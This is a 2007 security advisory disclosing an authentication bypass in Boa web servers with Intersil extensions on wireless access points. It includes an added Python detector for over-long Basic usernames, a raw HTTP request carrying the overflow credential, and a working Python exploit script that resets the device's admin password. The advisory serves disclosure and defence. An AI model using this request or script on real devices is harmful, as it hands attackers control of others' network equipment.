Boa (with Intersil Extensions) - HTTP Basic Authentication Bypass Sep 13 2007 11:04PM
luca carettoni securenetwork it
Secure Network - Security Research Advisory

Vuln name: HTTP Basic Authentication Bypass
Systems affected: Boa/0.93.15 (with Intersil Extensions) based systems (e.g. FreeLan 802.11g Wireless Access Point (RO80211G-AP))
Severity: High
Local/Remote: Remote
Vendor URL: http://www.boa.org - http://isl3893.sourceforge.net - http://www.roper-europe.com
Author(s): Luca "ikki" Carettoni - luca.carettoni (at) securenetwork (dot) it [email concealed], Claudio "paper" Merloni - claudio.merloni (at) securenetwork (dot) it [email concealed]
Vendor disclosure: 24th August 2007
Vendor acknowledged: -
Vendor patch release: -
Public disclosure: 10th September 2007
Advisory number: SN-2007-02
Advisory URL: http://www.securenetwork.it/advisories/

*** SUMMARY ***

Boa is a single-tasking HTTP server. That means that, unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections.
Boa is very low on hardware usage and is therefore used on many embedded systems, including routers, wireless access points and portable devices.
The Intersil isl3893 is an ARM9 System on Chip for wireless access points. The goal of the isl3893 project is to make an embedded distribution built around uClibc and uClinux.

It is possible to overwrite the "admin" password in memory, thus allowing an attacker to gain access to the web interface and alter configuration parameters. This vulnerability can be combined with another known vulnerability (CVE-2000-0920) to read arbitrary files from the device filesystem.

It is important to note that Boa httpd has no authentication code built in; the flaw is therefore located in the Intersil extensions, but this cannot be confirmed because no source code has been released for them.

*** VULNERABILITY DETAILS ***

When prompted for HTTP basic authentication credentials, a client can fill up the stack memory of the boa process by passing a string longer than 127 characters as the username. In that situation the string passed as the password overwrites the in-memory value of the admin password, enabling the attacker to reset it to a known value. Once the password has been reset, the attacker of course has access to the configuration panel.

As an example, the password can be set to "owned" by sending the following request to the web server:

GET / HTTP/1.1
Host: 192.168.0.1
Authorization: Basic YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh
YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh
YWFhYWFhYWFhYWFhYWFhYWFhYTpvd25lZA==

The basic authorization header parameter contains the base64/mime encoded string "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:owned"
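As an added example (not part of the advisory), the following Python code decodes the Basic credential from a raw HTTP request, reassembles a token that has been folded over several lines, and flags usernames longer than the 127-character limit described above. The sample requests are constructed here, not captured traffic, and the threshold constant and function names are assumptions.

```python
import base64
import re

# Advisory: a username longer than 127 chars overruns the stack memory of the boa
# process and the password after ':' lands on the stored admin password.
MAX_SAFE_USERNAME_LEN = 127
AUTH_RE = re.compile(r'^Authorization:\s*Basic\s+(\S+)\s*$', re.IGNORECASE)

def unfold_headers(raw_request):
    """Join obs-fold continuation lines (leading SP/HTAB) onto their header."""
    lines = []
    for line in raw_request.splitlines():
        if line[:1] in (' ', '\t') and lines:
            lines[-1] += line.strip()      # reassemble a token split over lines
        else:
            lines.append(line)
    return lines

def parse_basic_credential(token):
    """Decode a Basic token into (username, password), or None if malformed."""
    try:
        text = base64.b64decode(token, validate=True).decode('latin-1')
    except ValueError:                     # binascii.Error is a ValueError
        return None
    if ':' not in text:
        return None
    user, _, pwd = text.partition(':')
    return user, pwd

def inspect_request(raw_request):
    """Return (status, username_len); status is no-auth/malformed/ok/overflow."""
    for line in unfold_headers(raw_request):
        match = AUTH_RE.match(line)
        if not match:
            continue
        cred = parse_basic_credential(match.group(1))
        if cred is None:
            return 'malformed', 0
        user = cred[0]
        return ('overflow' if len(user) > MAX_SAFE_USERNAME_LEN else 'ok'), len(user)
    return 'no-auth', 0

def basic_token(user, pwd):                # what a client sends after "Basic "
    return base64.b64encode((user + ':' + pwd).encode()).decode()

# Constructed sample requests (not captured traffic); the overflow one folds
# its token over two lines, like the request quoted in the advisory.
SAMPLE_BENIGN = 'GET / HTTP/1.1\r\nAuthorization: Basic ' + basic_token('admin', 'admin') + '\r\n\r\n'
_TOKEN = basic_token('a' * 130, 'owned')
SAMPLE_OVERFLOW = 'GET / HTTP/1.1\r\nAuthorization: Basic ' + _TOKEN[:72] + '\r\n ' + _TOKEN[72:] + '\r\n\r\n'
```

Running `inspect_request` over each request a proxy or IDS sees gives a simple signature for this bypass attempt; the length check is the condition the advisory names, so it does not depend on the specific password chosen.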

*** EXPLOIT ***

The vulnerability can be exploited through a simple HTTP request, e.g. with a common web browser, by supplying the authentication credentials specified above.

The following snippet of python code can be used to reproduce the issue:

###### CUT HERE ######

#!/usr/bin/env python3
# Authenticates with an over-long username so that the password supplied here
# overwrites the admin password held in memory by the device.
import urllib.request

SERVER_IP_ADDRESS = '192.168.0.1'
# Username longer than 127 characters (the two literals are joined into one string)
USERNAME = ('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
            'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
NEW_PASSWORD = 'owned'
# Realm string presented by the device's basic authentication challenge
REALM = 'LOGIN(default username & password is admin)'

auth_handler = urllib.request.HTTPBasicAuthHandler()
auth_handler.add_password(REALM, SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD)
opener = urllib.request.build_opener(auth_handler)
urllib.request.install_opener(opener)
# The first answer is a 401 challenge; the handler retries with the credentials above
res = urllib.request.urlopen('http://' + SERVER_IP_ADDRESS + '/home/index.shtml')
print(res.status, res.reason)

###### CUT HERE ######

*** FIX INFORMATION ***

N/A

*** WORKAROUNDS ***

N/A

*********************
*** LEGAL NOTICES ***
*********************

Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.

We are committed to open, full disclosure of vulnerabilities, cooperating
with software developers for properly handling disclosure issues.

This advisory is copyright © 2007 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similar, provided that due credit is given to Secure Network.

The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.

E-mail: securenetwork (at) securenetwork (dot) it [email concealed]
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 0363 560 404
